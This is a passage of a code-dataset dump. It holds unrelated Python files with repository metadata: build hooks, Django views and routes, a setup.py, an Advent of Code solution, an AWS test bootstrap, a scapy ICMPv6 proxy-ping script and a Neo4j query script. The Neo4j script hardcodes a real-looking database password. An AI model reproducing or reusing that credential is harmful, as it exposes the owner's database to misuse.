get_requires_for_build_wheel(\n config_settings: Mapping[str, Any] | None = None\n) -> list[str]:\n logger.debug(\"Build hook: get_requires_for_build_wheel\")\n #return []\n return build_meta.get_requires_for_build_wheel(config_settings)\n\n\ndef get_requires_for_build_editable(self, config_settings=None):\n logger.debug(\"Build hook: get_requires_for_build_editable\")\n return 
get_requires_for_build_wheel(config_settings)\n\n\ndef prepare_metadata_for_build_wheel(\n metadata_directory: str,\n config_settings: dict[str, list[str] | str] | None = None,\n) -> str:\n logger.debug(\"Build hook: prepare_metadata_for_build_wheel\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n\n\ndef prepare_metadata_for_build_editable(metadata_directory, config_settings=None):\n logger.debug(\"Build hook: build_editable\")\n return build_meta.prepare_metadata_for_build_wheel(\n metadata_directory, config_settings\n )\n", "repo_name": "crungelab/cxbuild", "sub_path": "cxbuild/backend.py", "file_name": "backend.py", "file_ext": "py", "file_size_in_byte": 2998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "loguru.logger.debug", "line_number": 37, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "setuptools.build_meta.build_sdist", "line_number": 38, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 38, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 46, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "project.Project", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path.cwd", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "project.build_wheel", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 57, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 57, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 58, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": "setuptools.build_meta.build_editable", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 61, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 68, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 68, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_sdist", "line_number": 69, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 73, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "setuptools.build_meta.get_requires_for_build_wheel", "line_number": 77, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 77, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 81, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 81, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 89, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 89, "usage_type": "name"}, {"api_name": 
"setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 90, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 90, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 96, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 96, "usage_type": "name"}, {"api_name": "setuptools.build_meta.prepare_metadata_for_build_wheel", "line_number": 97, "usage_type": "call"}, {"api_name": "setuptools.build_meta", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "713246750", "text": "from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import Http404\nfrom .serializers import ReceitaSerializer\nfrom .models import Receita\nfrom rest_framework import status\n\ndef index(request):\n return HttpResponse(\"Olá mundo! Este é o app notes de Tecnologias Web do Insper.\")\n\n# GET\n@api_view(['GET', 'POST', 'DELETE'])\ndef api_receita(request, receita_id):\n try:\n receita = Receita.objects.get(id=receita_id)\n except Receita.DoesNotExist:\n raise Http404()\n\n if request.method == 'POST':\n new_receita_data = request.data\n receita.title = new_receita_data['title']\n receita.content = new_receita_data['ingredients']\n receita.content = new_receita_data['preparo']\n receita.save()\n\n\n if request.method == 'DELETE':\n receita.delete()\n return Response(status.HTTP_204_NO_CONTENT)\n\n serialized_receita = ReceitaSerializer(receita)\n return Response(serialized_receita.data)\n\n\n#\n@api_view(['GET','POST'])\ndef api_receita_list(request):\n\n if request.method == \"POST\":\n new_receita_data = request.data\n receita = Receita()\n receita.title = new_receita_data['title']\n receita.ingredients = new_receita_data['ingredients']\n receita.preparo = new_receita_data['preparo']\n receita.save()\n\n receitas = Receita.objects.all()\n serialized_receitas = ReceitaSerializer(receitas, many=True)\n return Response(serialized_receitas.data)\n\n", "repo_name": "rodrigonigri/TecWeb-Projeto3-backend", "sub_path": "receita/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1550, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.http.HttpResponse", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Receita.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 16, "usage_type": "name"}, {"api_name": "models.Receita.DoesNotExist", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 17, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Receita", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Receita.objects.all", "line_number": 48, 
"usage_type": "call"}, {"api_name": "models.Receita.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Receita", "line_number": 48, "usage_type": "name"}, {"api_name": "serializers.ReceitaSerializer", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "28507254755", "text": "from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as file:\n readme = file.read()\n file.close()\n\nwith open(\"CHANGELOG.md\", \"r\") as file:\n readme += \"\\n\\n\"\n readme += file.read()\n file.close()\n\nsetup(\n name=\"aiodown\",\n version=\"1.0.7\",\n packages=find_packages(),\n install_requires=[\n \"async-files >= 0.4\",\n \"httpx[http2] >= 0.20\",\n \"humanize >= 3.2.0\",\n ],\n url=\"https://github.com/AmanoTeam/aiodown\",\n python_requires=\">=3.8\",\n author=\"AmanoTeam\",\n author_email=\"contact@amanoteam.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Topic :: Internet\",\n ],\n description=\"A fully async file downloader with httpx\",\n download_url=\"https://github.com/AmanoTeam/aiodown/releases/latest\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"python, downloader, async, asyncio, httpx, file\",\n project_urls={\n \"Bug report\": \"https://github.com/AmanoTeam/aiodown/issues\",\n \"Donate\": \"https://liberapay.com/AmanoTeam\",\n \"Source\": \"https://github.com/AmanoTeam/aiodown\",\n },\n)\n", "repo_name": "AmanoTeam/aiodown", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "32939602732", "text": "from pathlib import Path\n\n\ndef part_1() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n match = {\n \"X\": \"A\",\n \"Y\": \"B\",\n \"Z\": \"C\",\n }\n wins = {\n \"X\": \"C\", # rock beats scissors\n \"Y\": \"A\", # paper beats rock\n \"Z\": \"B\", # scissors beats paper\n }\n\n base_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if match[p2] == p1:\n total_score += 3 + base_score[p2]\n print(\"draw\")\n elif wins[p2] == p1:\n total_score += 6 + base_score[p2]\n print(\"win\")\n else:\n total_score += base_score[p2]\n print(\"loss\")\n return total_score\n\n\ndef part_2() -> int:\n \"\"\"\n ROCK: A and X\n PAPER: B and Y\n SCISSORS: C and Z\n \"\"\"\n loser_hands = {\n \"A\": \"C\", # rock beats scissors\n \"B\": \"A\", # paper beats rock\n \"C\": \"B\", # scissors beats paper\n }\n winner_hands = {\n \"C\": \"A\", # rock beats 
scissors\n \"A\": \"B\", # paper beats rock\n \"B\": \"C\", # scissors beats paper\n }\n\n base_score = {\n \"A\": 1,\n \"B\": 2,\n \"C\": 3,\n }\n translate = {\n \"A\": \"rock\",\n \"B\": \"paper\",\n \"C\": \"scissors\",\n }\n with open(Path(__file__).parent / \"input.txt\") as file:\n total_score = 0\n for line in file:\n line = line.strip()\n p1, p2 = line.split(\" \")\n if p2 == \"Z\": # win\n winner_hand = winner_hands[p1]\n total_score += 6 + base_score[winner_hand]\n print(\n f\"must win, pick {translate[winner_hand]} against {translate[p1]}\"\n )\n elif p2 == \"X\": # lose\n loser_hand = loser_hands[p1]\n total_score += 0 + base_score[loser_hand]\n print(\n f\"must lose, pick {translate[loser_hand]} against {translate[p1]}\"\n )\n else: # draw\n total_score += 3 + base_score[p1]\n print(f\"must draw, pick {translate[p1]} against {translate[p1]}\")\n return total_score\n\n\nif __name__ == \"__main__\":\n print(part_1())\n print(part_2())\n", "repo_name": "rbusquet/advent-of-code", "sub_path": "aoc_2022/day02.py", "file_name": "day02.py", "file_ext": "py", "file_size_in_byte": 2461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "23349204010", "text": "import logging\n\nfrom acktest.bootstrapping import Resources, BootstrapFailureException\nfrom acktest.bootstrapping.sqs import Queue\nfrom acktest.bootstrapping.sns import Topic\nfrom acktest.aws.identity import get_region, get_account_id\n\nfrom e2e import bootstrap_directory\nfrom e2e.bootstrap_resources import BootstrapResources\n\ntopic1 = Topic(name_prefix=\"subscribe-topic\")\ntopic2 = Topic(name_prefix=\"adoption-subscribe-topic\")\n\nqueue_policy = \"\"\"{\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"sns.amazonaws.com\"\n },\n \"Action\": \"sqs:SendMessage\",\n \"Resource\": \"arn:aws:sqs:$REGION:$ACCOUNT_ID:$NAME\",\n \"Condition\": {\n \"ArnEquals\": {\n \"aws:SourceArn\": \"arn:aws:sns:$REGION:$ACCOUNT_ID:$TOPIC_NAME\"\n }\n }\n }\n ]\n}\n\"\"\"\n\nqueue1_policy_vars = {\n \"$TOPIC_NAME\": topic1.name,\n}\n\nqueue2_policy_vars = {\n \"$TOPIC_NAME\": topic2.name,\n}\n\ndef service_bootstrap() -> Resources:\n logging.getLogger().setLevel(logging.INFO)\n\n resources = BootstrapResources(\n Topic1=topic1,\n Topic2=topic2,\n Queue1=Queue(\n name_prefix=\"subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue1_policy_vars,\n ),\n Queue2=Queue(\n name_prefix=\"adoption-subscribe-queue\",\n policy=queue_policy,\n policy_vars=queue2_policy_vars,\n ),\n )\n\n try:\n resources.bootstrap()\n except BootstrapFailureException as ex:\n exit(254)\n\n return resources\n\nif __name__ == \"__main__\":\n config = service_bootstrap()\n # Write config to current directory by default\n config.serialize(bootstrap_directory)\n", "repo_name": "aws-controllers-k8s/sns-controller", "sub_path": "test/e2e/service_bootstrap.py", "file_name": "service_bootstrap.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 11, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sns.Topic", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, 
{"api_name": "logging.INFO", "line_number": 42, "usage_type": "attribute"}, {"api_name": "e2e.bootstrap_resources.BootstrapResources", "line_number": 44, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 47, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.sqs.Queue", "line_number": 52, "usage_type": "call"}, {"api_name": "acktest.bootstrapping.BootstrapFailureException", "line_number": 61, "usage_type": "name"}, {"api_name": "acktest.bootstrapping.Resources", "line_number": 41, "usage_type": "name"}, {"api_name": "e2e.bootstrap_directory", "line_number": 69, "usage_type": "argument"}]} +{"seq_id": "337553348", "text": "import os\nimport sys\nsys.path.insert(0, '../..')\nimport binascii\nimport pprint\n\n# ----- SCHC ------\n\n\nfrom gen_rulemanager import *\nfrom compr_parser import *\nfrom gen_utils import dprint, dpprint\n\n\n# ----- scapy -----\n\nfrom kamene.all import *\n\nimport ipaddress\n\nclass debug_protocol:\n def _log(*arg):\n dprint(*arg)\n\nP = Parser(debug_protocol)\nRM = RuleManager()\n\ndef AnalyzePkt(packet):\n global RM\n \n dprint(len(packet), \"\".join([\"%02x\"%_ for _ in bytes(packet)]))\n\n withoutL2 = bytes(packet)\n\n print (\"\".join([\"%02x\"%_ for _ in withoutL2]))\n try:\n fields, data = P.parse(withoutL2, direction=T_DIR_DW)\n except:\n print (\"not a parsable packet\")\n return\n \n dpprint(fields)\n dprint(data)\n \n rule,dev_id = RM.FindRuleFromPacket(fields, direction=T_DIR_DW)\n pprint.pprint (rule)\n\n if rule == None:\n return\n \n if \"Action\" in rule:\n if rule[T_ACTION] == T_ACTION_PPING:\n print (\"proxy ping\")\n\n print (hex(fields[(T_IPV6_DEV_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_DEV_IID, 1)][0]))\n print (hex(fields[(T_IPV6_APP_PREFIX, 1)][0]))\n print (hex(fields[(T_IPV6_APP_IID, 1)][0]))\n\n IPv6Src = (fields[(T_IPV6_DEV_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_DEV_IID, 1)][0]\n IPv6Dst = (fields[(T_IPV6_APP_PREFIX, 1)][0]<< 64) + fields[(T_IPV6_APP_IID, 1)][0]\n\n\n IPv6SrcStr = ipaddress.IPv6Address(IPv6Src)\n IPv6DstStr = ipaddress.IPv6Address(IPv6Dst)\n\n IPv6Header = IPv6 (\n version = fields[(T_IPV6_VER, 1)][0],\n tc = fields[(T_IPV6_TC, 1)][0],\n fl = fields[(T_IPV6_FL, 1)][0],\n nh = fields[(T_IPV6_NXT, 1)][0],\n hlim = 30,\n src = IPv6SrcStr.compressed,\n dst = IPv6DstStr.compressed\n )\n\n txt = \"SCHC device is alive\"\n\n Echo = ICMPv6EchoReply(\n id = fields[(T_ICMPV6_IDENT, 1)][0],\n seq = fields[(T_ICMPV6_SEQNB, 1)][0],\n data = data\n #data = txt.encode() + data[len(txt):]\n )\n\n myMessage = IPv6Header / Echo\n myMessage.show()\n send (myMessage, iface=\"he-ipv6\")\n else:\n pass #should compresss\n \nif __name__ == '__main__':\n\n print (sys.argv)\n\n RM = RuleManager()\n RM.Add(file=\"example/comp-rule-100.json\")\n\n sniff (filter=\"ip6\", prn=AnalyzePkt, iface=\"he-ipv6\")\n", "repo_name": "openschc/openschc", "sub_path": "src/net_compression.py", "file_name": "net_compression.py", "file_ext": "py", "file_size_in_byte": 2561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "gen_utils.dprint", "line_number": 23, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 31, "usage_type": "call"}, {"api_name": "gen_utils.dpprint", "line_number": 42, "usage_type": "call"}, {"api_name": "gen_utils.dprint", "line_number": 43, "usage_type": 
"call"}, {"api_name": "pprint.pprint", "line_number": 46, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 64, "usage_type": "call"}, {"api_name": "ipaddress.IPv6Address", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "8116064835", "text": "from py2neo import Graph\r\n\r\ng = Graph(\"http://localhost:7474\", username=\"neo4j\", password=\"cooperck890303\")\r\nnum_limit = 20\r\n\r\n\r\nprint(1)\r\nqueries = [\"MATCH (m:project)-[r:contains_unit]->(n:unit) where m.id = '{0}' RETURN m.name, r.name, n.name, n.id\".format('DX-01')]\r\nprint(queries)\r\nanswers = []\r\nress = g.run(queries[0]).data()\r\nprint(ress)\r\nanswers += ress\r\nprint(answers)\r\n# unit_id = answers[0]['n.id']\r\n# print('unit_id',unit_id)\r\nprocess_id=[] # 存储流程id\r\nfor i in answers:\r\n sql_1 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where c.id = '{0}' RETURN a.id\".format(i['n.id'])]\r\n print(sql_1)\r\n ress_1 = g.run(sql_1[0]).data() # [{'a.id':XXX}]\r\n if len(ress_1) == 0:\r\n break\r\n#print(i['n.id'])\r\nprocess_id.append(i['n.id'])#输入第一个单元的id\r\n#print(process_id)\r\na = process_id[0]\r\nfor j in answers:\r\n sql_2 = [\"MATCH (a:unit)-[b:water_flow]->(c:unit) where a.id = '{0}' RETURN c.id\".format(a)]\r\n print(sql_2)\r\n ress_2 = g.run(sql_2[0]).data()#[{'c.id':XXX}]\r\n if len(ress_2) ==0:\r\n break\r\n b=ress_2[0]['c.id']\r\n process_id.append(b)\r\n a=b\r\nprint(process_id) #得��按顺序的单元id\r\n# 下面找出单元id对应的单元名称\r\nprocess_name=[]\r\nfor k in process_id:\r\n sql_3 = [\"MATCH (a:unit) where a.id = '{0}' RETURN a.name\".format(k)]\r\n ress_3 = g.run(sql_3[0]).data() # [{'a.name':XXX}]\r\n n=ress_3[0]['a.name']\r\n process_name.append(n)\r\nprint(process_name)\r\nx='工艺流程为:{0}'.format('-->'.join(list(set(process_name))))\r\nprint(x)", "repo_name": "cooperck/QA_ReuseWater_KG", "sub_path": "test03.py", "file_name": "test03.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "py2neo.Graph", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "74516053609", "text": "from django.urls import path\nfrom django.contrib.auth import views as auth_views\n\n\nfrom imdb_api.views.main import frontpage, dashboard, admin_dashboard\nfrom imdb_api.views.signup import signup\nfrom imdb_api.views.login_view import login_view, logout_view\nfrom imdb_api.views.movies_view import (\n all_movies, new_movies, movie_details_with_trailers,\n movie_details, movie_search, base_genre_movies, genre_movies, dash_movie_search, genre_list\n )\nfrom imdb_api.views.movie_serializer_view import MovieView\nfrom imdb_api.views.genre_serializer_view import GenresView\nfrom imdb_api.views.user_recommendations import user_recommendations\n\nfrom imdb_api.views.admin_panel_view import AdminView\nfrom imdb_api.views.user_panel_view import vote_for_movie, toggle_favorite, user_update_profile, CommentView\n\n\napp_name = \"imdb\"\nurlpatterns = [\n path(\"\", frontpage, name='frontpage'),\n\n # path for user dashboard\n path(\"dashboard/\", dashboard, name='dashboard'),\n path('movie_search/', movie_search, name='movie_search'),\n path('dash_movie/', dash_movie_search, name='dash_movie_search'),\n path('user_update_profile/', user_update_profile, name='user_update_profile'),\n \n # path for admin dashboard\n path('admin_dashboard/', admin_dashboard, name='admin_dashboard'),\n path('update_profile//', 
AdminView.update_user_profile, name='update_profile'),\n path('see_all_users/', AdminView.see_all_users, name='see_all_users'),\n path(\"delete_user//\", AdminView.delete_user, name=\"del_user\"),\n path('see_all_genres/', AdminView.see_all_genres, name='see_all_genres'),\n path('add_genre/', AdminView.add_genre, name='add_genre'),\n path(\"delete_genre//\", AdminView.delete_genre, name=\"del_genre\"),\n path('see_all_movies/', AdminView.see_all_movies, name='see_all_movies'),\n path('add_movie_not_authomatic/', AdminView.add_movie_not_authomatic, name='add_movie_not_authomatic'),\n path(\"update_movie//\", AdminView.update_movie, name=\"update_movie\"),\n # path for Signup, Login, Logout\n path(\"signup/\", signup, name=\"signup\"),\n path(\"login/\", login_view, name=\"login\"),\n path(\"logout/\", logout_view, name=\"logout\"),\n path('recommendations/', user_recommendations, name='user_recommendations'),\n path('vote_for_movie//', vote_for_movie, name='vote_for_movie'),\n path('toggle_favorite//', toggle_favorite, name='toggle_favorite'),\n\n # path for all movie infos.\n path('all_movies/', all_movies, name='all_movies'),\n path('new_movies', new_movies, name='new_movies'),\n path('movie_details//', movie_details, name='movie_details'),\n path('detail&trailer//', movie_details_with_trailers, name='detail&trailer'),\n path('genre_movies//', genre_movies, name='genre_movies'),\n path('base_genre_movies//', base_genre_movies, name='base_genre_movies'),\n path('genres/', genre_list, name='genre_list'),\n \n # path for comments\n path('comment//', CommentView.as_view(), name='comment'),\n \n # APIs for movies\n path(\"apis/movies/\", MovieView.as_view(), name=\"apis_movies\"),\n path(\"apis/movies//\", MovieView.as_view(), name=\"apis_movies\"),\n # APIs for genres\n path(\"apis/genres/\", GenresView.as_view(), name=\"genres\"),\n path(\"apis/genres//\", GenresView.as_view(), name=\"genre\"),\n \n\n\n]\n\n \n \n\n\n", "repo_name": "MarcinIgna/imdb-django-api", "sub_path": "imdb_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "imdb_api.views.main.frontpage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "imdb_api.views.main.dashboard", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_search", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.dash_movie_search", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.user_update_profile", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "imdb_api.views.main.admin_dashboard", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_user_profile", "line_number": 32, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 32, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_users", "line_number": 33, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_user", "line_number": 34, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_genres", "line_number": 35, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_genre", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.delete_genre", "line_number": 37, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.see_all_movies", "line_number": 38, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.add_movie_not_authomatic", "line_number": 39, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView.update_movie", "line_number": 40, "usage_type": "attribute"}, {"api_name": "imdb_api.views.admin_panel_view.AdminView", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "imdb_api.views.signup.signup", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.login_view", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.logout_view", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "imdb_api.views.user_recommendations.user_recommendations", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.vote_for_movie", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.toggle_favorite", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": 
"imdb_api.views.movies_view.all_movies", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.new_movies", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details_with_trailers", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_movies", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.base_genre_movies", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_list", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, 